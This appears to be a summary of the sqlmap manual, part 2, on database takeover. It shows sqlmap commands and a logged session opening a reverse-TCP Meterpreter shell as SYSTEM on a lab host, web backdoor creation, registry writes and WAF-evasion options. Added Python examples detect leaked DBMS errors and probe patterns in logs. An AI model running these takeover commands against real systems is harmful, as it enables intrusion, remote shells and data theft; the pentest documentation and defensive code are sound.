SQLmap User Manual Summary (Part 2)
Other advanced features
User-defined function injection
Options: --udf-inject, --shared-lib
You can inject your own user-defined functions (UDFs) by compiling a MySQL or PostgreSQL shared library (a DLL on Windows, a shared object on Linux/Unix). sqlmap asks you a few questions, uploads the UDFs to the database server and executes them according to your answers; when the injection is finished, sqlmap removes them again.
File system access
Reading a file from the database server
Option: --file-read
Available when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges needed to use the relevant functions. The file read can be either text or binary.
Uploading a file to the database server
Options: --file-write, --file-dest
Available when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges needed to use the relevant functions. The uploaded file can be either text or binary.
Running arbitrary operating system commands
Options: --os-cmd, --os-shell
Available when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges needed to use the relevant functions.
On MySQL and PostgreSQL, sqlmap uploads a binary library containing the user-defined functions sys_exec() and sys_eval(); the two functions it creates can then execute system commands. On Microsoft SQL Server, sqlmap uses the xp_cmdshell stored procedure: if it is disabled (the default on Microsoft SQL Server 2005 and later), sqlmap re-enables it, and if it does not exist, sqlmap creates it.
With --os-shell you can also simulate a real shell and type the commands you want to run.
When stacked (multi-statement) queries cannot be executed (for example a PHP or ASP front end with a MySQL back end), it may still be possible to use INTO OUTFILE to write into a writable directory and create a web backdoor. Supported languages:
1. ASP
2. ASP.NET
3. JSP
4. PHP
Working with Meterpreter
Options: --os-pwn, --os-smbrelay, --os-bof, --priv-esc, --msf-path, --tmp-path
When the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges needed to use the relevant functions, a TCP connection can be established directly between the database server and the attacker; this connection can be an interactive command-line Meterpreter session. sqlmap generates the shellcode with Metasploit and has four ways to execute it:
1. Execute the Metasploit shellcode in memory via the user-defined sys_bineval() function; supported on MySQL and PostgreSQL; option --os-pwn.
2. Upload a stand-alone payload and execute it via a user-defined function: sys_exec() on MySQL and PostgreSQL, xp_cmdshell() on Microsoft SQL Server; option --os-pwn.
3. Execute the Metasploit shellcode via an SMB reflection attack (MS08-068), when the privileges sqlmap has obtained are high enough (uid=0 on Linux/Unix, Administrator on Windows); option --os-smbrelay.
4. Execute the Metasploit payload in memory by overflowing the sp_replwritetovarbin stored procedure of Microsoft SQL Server 2000 and 2005 (MS09-004); option --os-bof.
A MySQL example:
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit
[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [192.168.136.1]
which local port number do you want to use? [60641]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..
[Metasploit Framework ASCII-art banner]
       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12272 updated 4 days ago (2011.04.07)
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11 hh:mm:52 +0100 2011
meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The 'priv' extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS : Windows .NET Server (Build 3790, Service Pack 2).
Computer : W2K3R2
Architecture : x86
Meterpreter : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address : 192.168.136.129
Netmask : 255.255.255.0
meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit
By default MySQL runs as SYSTEM on Windows; PostgreSQL runs as a low-privileged user on both Windows and Linux; Microsoft SQL Server 2000 runs as SYSTEM by default, while 2008 mostly runs as NETWORK SERVICE and sometimes as LOCAL SERVICE.
Windows registry access
Available when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the web application supports stacked queries. Naturally, the database user of the current connection also needs the privileges to operate on the registry.
Reading a registry key value
Option: --reg-read
Writing a registry key value
Option: --reg-add
Deleting a registry key value
Option: --reg-del
Auxiliary registry options
Options: --reg-key, --reg-value, --reg-data, --reg-type
These are used together with the three options above. Example:
$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
General options
Loading a session from a SQLite file
Option: -s
sqlmap automatically creates a SQLite file for every target under the output directory; use this option when you want to specify the session file to read.
Saving the HTTP(S) traffic log
Option: -t
This option takes a text file; sqlmap saves the log of its HTTP(S) requests and responses there.
Non-interactive mode
Option: --batch
With this option no user input is required: sqlmap keeps running using the default answers to its prompts.
Forcing the character encoding
Option: --charset
Instead of the character encoding sqlmap detects automatically (for example from the Content-Type HTTP header), force a specific one, e.g.:
--charset=GBK
Crawling the website
Option: --crawl
sqlmap can collect links that may be vulnerable; the value of the option is the crawl depth.
Example:
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
[...]
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:00] [INFO] 42/56 links visited (75%)
[...]
Setting the CSV output delimiter
Option: --csv-del
When the dump is saved in CSV format (--dump-format=CSV) a delimiter is needed; the default is a comma, and the user can change it, e.g.:
--csv-del=";"
DBMS authentication credentials
Option: --dbms-cred
Sometimes the privileges of the current user are insufficient and certain operations fail; if you know the password of a higher-privileged user, you can pass it with this option. Some DBMSes have a dedicated run-as mechanism for switching users, such as the OPENROWSET function of Microsoft SQL Server.
Setting the dump data format
Option: --dump-format
The output format can be CSV, HTML or SQLITE.
Estimated time of arrival
Option: --eta
Computes the time remaining to retrieve the injected data.
For example, boolean-based blind injection on Oracle:
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta
[...]
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========> ] 11/64 ETA 00:19
and then:
100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
sqlmap first retrieves the length of the output, then shows the estimated completion time and the percentage done, and finally prints the retrieved characters.
Flushing the session file
Option: --flush-session
Use this option if you do not want to reuse the session file cached for this target; it clears the previous session and tests the target again.
Testing forms automatically
Option: --forms
To test the parameters of a form on a page, you can read a request file with -r or pass the data with --data. With --forms, however, sqlmap automatically fetches the forms from the page at the URL given with -u and tests them.
Ignoring query results stored in the session file
Option: --fresh-queries
Ignores the query results saved in the session file and queries again.
Using the DBMS hex function
Option: --hex
Character-encoding problems can sometimes cause data loss during retrieval; the DBMS hex function can be used to avoid this.
A PostgreSQL example:
$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors
[...]
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR: invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>'
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
[...]
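The ":vtj:" and ":nxb:" strings in the error above are the random markers sqlmap wraps around the hex-encoded value so that it can pick the result out of the error text, and the CHR(85)||CHR(84)||CHR(70)||CHR(56) / CHR(72)||CHR(69)||CHR(88) arguments spell UTF8 and HEX for ENCODE(CONVERT_TO(...)). The Python below is an added example for this summary, not code from sqlmap or from the manual: it decodes such a marker-wrapped hex value from a constructed copy of the leaked error line, and then shows why the hex detour matters by pushing a non-ASCII value through a page that the client decodes as Latin-1, once as raw bytes and once hex-encoded. The marker shape (two random three-letter strings between colons) is inferred from the single sample above; the error line and the "Région" value are constructed.

```python
import re

# Marker shape inferred from the sample on the page: ':xxx:<hex>:yyy:' with two
# random three-letter markers. This is an assumption based on that one sample.
MARKER_RE = re.compile(r":([a-z]{3}):([0-9a-fA-F]+):([a-z]{3}):")

# Constructed sample of the leaked PostgreSQL error. The hex is the banner
# "PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2"
# as UTF-8 bytes, which is what ENCODE(CONVERT_TO(v, 'UTF8'), 'HEX') produces.
SAMPLE_ERROR = (
    "pg_query(): Query failed: ERROR: invalid input syntax for type numeric: "
    '":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d'
    "676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c2028446562"
    '69616e20342e332e322d312e312920342e332e32:nxb:" in /var/www/app/db.inc.php on line 35'
)


def decode_marked_hex(text):
    """Return every marker-wrapped hex value found in `text`, decoded as UTF-8."""
    return [bytes.fromhex(h).decode("utf-8", errors="replace")
            for _start, h, _end in MARKER_RE.findall(text)]


def round_trip(value, use_hex, page_charset="latin-1"):
    """Model the retrieval path: the DBMS emits `value` as UTF-8 bytes into an
    HTML page, and the client decodes that page with `page_charset`.
    With use_hex the DBMS side first hex-encodes the bytes (the --hex behaviour),
    so only [0-9a-f] travel through the page and the client un-hexes afterwards."""
    raw = value.encode("utf-8")
    if use_hex:
        raw = raw.hex().encode("ascii")
    seen = raw.decode(page_charset, errors="replace")
    return bytes.fromhex(seen).decode("utf-8") if use_hex else seen


if __name__ == "__main__":
    print(decode_marked_hex(SAMPLE_ERROR)[0])
    print(round_trip("Région", use_hex=False))  # mojibake once the page is read as Latin-1
    print(round_trip("Région", use_hex=True))   # intact, because only hex digits crossed the page
```

Without --hex the two UTF-8 bytes of "é" are read back as two Latin-1 characters, which is exactly the kind of loss the paragraph above refers to; with the hex detour the transcoding cannot touch the payload. For a defender, the same decoder turns the hex blobs found in leaked DBMS errors in application logs back into the values that were actually retrieved.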
Customising the output directory
Option: --output-dir
By default sqlmap saves session and result files under the output folder; use this option to set a custom path, for example: --output-dir=/tmp
Parsing DBMS error messages from responses
Option: --parse-errors
Sometimes the target has not disabled DBMS error reporting, so when a SQL statement fails the error is returned in the page; with this option sqlmap parses and displays those error messages.
$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
[...]
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] target URL appears to have 3 columns in query
[...]
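The error text above is exactly what --parse-errors harvests, and the three "ORDER BY position number N is out of range" messages are the trace of sqlmap counting the columns of the vulnerable query. A defender can run the same kind of parsing over their own application's responses to confirm that no DBMS error ever reaches the client. The Python below is an added example for this summary, not code from sqlmap or from the manual: it strips HTML from a response body, matches known DBMS error signatures (the ones visible on this page plus a few well-known fragments for the same DBMS families), and pulls the probed ORDER BY positions out of the messages. The response bodies are constructed from the error text on the page; the hardened error page is a constructed counter-example.

```python
import html
import re

# Signatures of verbose DBMS errors as they appear in HTML responses. The first
# entries per family are taken from the error text shown in this summary; the
# rest are well-known message fragments for the same DBMS families.
DBMS_ERROR_SIGNATURES = {
    "Microsoft SQL Server": [
        r"Microsoft OLE DB Provider for ODBC Drivers",
        r"\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\]",
        r"Unclosed quotation mark after the character string",
    ],
    "PostgreSQL": [
        r"pg_query\(\)",
        r"invalid input syntax for type \w+",
        r"PostgreSQL query failed",
    ],
    "MySQL": [
        r"You have an error in your SQL syntax",
        r"mysql_fetch_array\(\)",
        r"supplied argument is not a valid MySQL",
    ],
    "Oracle": [r"\bORA-\d{5}\b"],
}

TAG_RE = re.compile(r"<[^>]+>")
ORDER_BY_RE = re.compile(r"ORDER BY position number (\d+) is out of range")


def strip_html(fragment):
    """Remove tags, unescape entities and collapse whitespace."""
    return " ".join(html.unescape(TAG_RE.sub(" ", fragment)).split())


def find_dbms_errors(body):
    """Return (dbms_family, cleaned_line) for each response line carrying a DBMS error signature."""
    leaks = []
    for raw_line in body.splitlines():
        line = strip_html(raw_line)
        for family, patterns in DBMS_ERROR_SIGNATURES.items():
            if any(re.search(p, line) for p in patterns):
                leaks.append((family, line))
                break  # one family per line is enough
    return leaks


def order_by_positions(leaks):
    """Column positions probed via ORDER BY, in the order they were seen."""
    return [int(m.group(1)) for _, line in leaks for m in ORDER_BY_RE.finditer(line)]


# Constructed response bodies, modelled on the error text shown in this summary:
# three consecutive responses of the ORDER BY column-count probe (10, 6, 4).
SAMPLE_MSSQL = "\n".join(
    "<b>Microsoft OLE DB Provider for ODBC Drivers</b> (0x80040E14)<br>\n"
    "[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number "
    f"{n} is out of range of the number of items in the select list.<br>\n"
    "<b>/app/get_int.asp, line 27</b><br>"
    for n in (10, 6, 4)
)

SAMPLE_PGSQL = (
    "<b>Warning</b>: pg_query() [<a href='function.pg-query'>function.pg-query</a>]: "
    "Query failed: ERROR: invalid input syntax for type numeric: &quot;:vtj:5066:nxb:&quot; "
    "in <b>/var/www/app/pgsql.inc.php</b> on line <b>35</b>"
)

# Hardened behaviour: a generic error page with a correlation id and no DBMS text.
SAMPLE_HARDENED = "<h1>Something went wrong</h1><p>Reference: err-0001 (constructed)</p>"

if __name__ == "__main__":
    leaks = find_dbms_errors(SAMPLE_MSSQL)
    for family, line in leaks:
        print(family, "|", line)
    print("probed ORDER BY positions:", order_by_positions(leaks))
    print("hardened page leaks:", find_dbms_errors(SAMPLE_HARDENED))
```

Run as a check in an application's test suite ("no response body matches any signature"), this is the mitigation side of --parse-errors: once the application returns only a generic error page, the column-counting and error-based extraction shown above lose their feedback channel. The descending sequence 10, 6, 4 from one client within a second is also a usable detection signal in web-server or application logs.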
Miscellaneous options
Using short mnemonics for options
Option: -z
When the options are long and complex, you can use the mnemonic shorthand. For example:
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"
can be written as:
python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"
and:
python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"
can be written as:
python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"
Alerting when SQL injection is found
Option: --alert
Setting the answers to prompts
Option: --answers
When you want sqlmap to supply your own answers automatically whenever it prompts for input, use this option. Example:
$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1" --technique=E --answers="extending=N" --batch
[...]
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
[...]
Beeping when SQL injection is found
Option: --beep
Emits a beep when a SQL injection is found.
Heuristic detection of WAF/IPS/IDS protection
Option: --check-waf
WAF/IPS/IDS protection can get badly in sqlmap's way; if you suspect the target is protected, use this option to test for it. sqlmap sends an injection test in a parameter that does not exist, for example:
&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1
If protection is in place, the response is likely to differ.
Cleaning up sqlmap's UDFs and tables
Option: --cleanup
Removes the UDFs and tables created during injection.
Disabling coloured output
Option: --disable-coloring
sqlmap colours its output by default; use this option to turn colouring off.
Using a specific Google results page
Option: --gpage
By default sqlmap uses the first 100 URLs of the Google results as injection test targets; combined with this option you can specify which results page to test.
Using HTTP parameter pollution
Option: --hpp
HTTP parameter pollution may bypass WAF/IPS/IDS protection; it is particularly effective against the ASP/IIS and ASP.NET/IIS platforms.
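From the defender's side, both the --check-waf probe described above (a SQL payload in a parameter the endpoint never defined) and HTTP parameter pollution (the same parameter name repeated within one query string) are visible in ordinary web-server access logs, whether or not a WAF is in front of the application. The Python below is an added example for this summary, not sqlmap code or anything from the manual: it parses a few constructed access-log lines, compares each request's parameter names against an assumed per-endpoint allowlist (KNOWN_PARAMS, a hypothetical configuration), and flags unexpected parameters, SQL-keyword payloads and repeated parameter names. The log lines and addresses are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Common Log Format line; the constructed samples below follow this shape.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# Fragments of the --check-waf style probe and of common boolean tests.
SQLI_RE = re.compile(
    r"\bUNION\s+(ALL\s+)?SELECT\b|\binformation_schema\b|\b(AND|OR)\s+\d+\s*=\s*\d+",
    re.IGNORECASE,
)

# Hypothetical allowlist: which query parameters each endpoint is known to accept.
KNOWN_PARAMS = {
    "/vuln.php": {"id"},
    "/search.php": {"q", "page"},
}


def analyse_request(target):
    """Return a list of (finding, detail) tuples for one request target."""
    url = urlsplit(target)
    pairs = parse_qsl(url.query, keep_blank_values=True)  # keeps duplicates, decodes %xx
    findings = []

    # HTTP parameter pollution: the same name appears more than once.
    names = [name for name, _ in pairs]
    repeated = sorted({n for n in names if names.count(n) > 1})
    if repeated:
        findings.append(("hpp_repeated_param", repeated))

    allowed = KNOWN_PARAMS.get(url.path)
    for name, value in pairs:
        if allowed is not None and name not in allowed:
            findings.append(("unexpected_param", name))
        if SQLI_RE.search(value):
            findings.append(("sqli_pattern", name))
    return findings


def scan_access_log(lines):
    """Return (client_ip, target, findings) for every log line with at least one finding."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyse_request(m["target"])
        if findings:
            alerts.append((m["ip"], m["target"], findings))
    return alerts


# Constructed access-log sample: a normal request, a --check-waf style probe in a
# parameter the endpoint does not define, and a polluted (repeated) id parameter.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Apr/2011:10:00:01 +0100] "GET /vuln.php?id=1 HTTP/1.1" 200 512',
    '192.0.2.77 - - [11/Apr/2011:10:00:02 +0100] "GET /vuln.php?id=1&foobar=AND%201%3D1%20UNION'
    '%20ALL%20SELECT%201,2,3,table_name%20FROM%20information_schema.tables%20WHERE%202%3E1 HTTP/1.1" 200 512',
    '192.0.2.77 - - [11/Apr/2011:10:00:03 +0100] "GET /vuln.php?id=1&id=2 HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for ip, target, findings in scan_access_log(SAMPLE_LOG):
        print(ip, target, findings)
```

The allowlist is what makes the unexpected-parameter finding precise: the probe above relies on the application ignoring a parameter it never defined, so a request carrying one is anomalous regardless of its content. Repeated names are weaker evidence on their own (some frameworks use them legitimately for multi-value fields), which is why the example reports them as a separate finding rather than folding them into the injection pattern.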
Identifying WAF/IPS/IDS protection
Option: --identify-waf
sqlmap can try to identify the WAF/IPS/IDS product protecting the target, so that the user can work out a way around it. About 30 products are currently recognised.
For example, against a MySQL target protected by the ModSecurity WAF:
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
[...]
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
[...]
Imitating a smartphone
Option: --mobile
Sometimes the server only accepts requests from mobile clients; in that case you can set a smartphone User-Agent to imitate a phone.
Example:
$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]
Securely deleting the files in the output directory
Option: --purge-output
Sometimes result files must be deleted in a way that prevents recovery; with this option the original files are overwritten with random data before removal.
Example:
$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]
Heuristic injection testing
Option: --smart
When testing a target with a very large number of URLs, this option saves time by injecting only into parameters that the error heuristics quickly flag as likely injectable.
Example:
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[...]
Wizard for beginners
Option: --wizard
Aimed at beginners: it guides you step by step through the input needed to test a target.
References:
安全牛課堂 course, Kali Linux web chapter
sqlmap user manual, Chinese edition: https://octobug.gitbooks.io/sqlmap-wiki-zhcn/content/Users-manual/Introduction.html
sqlmap user manual: http://drops.xmd5.com/static/drops/tips-143.htm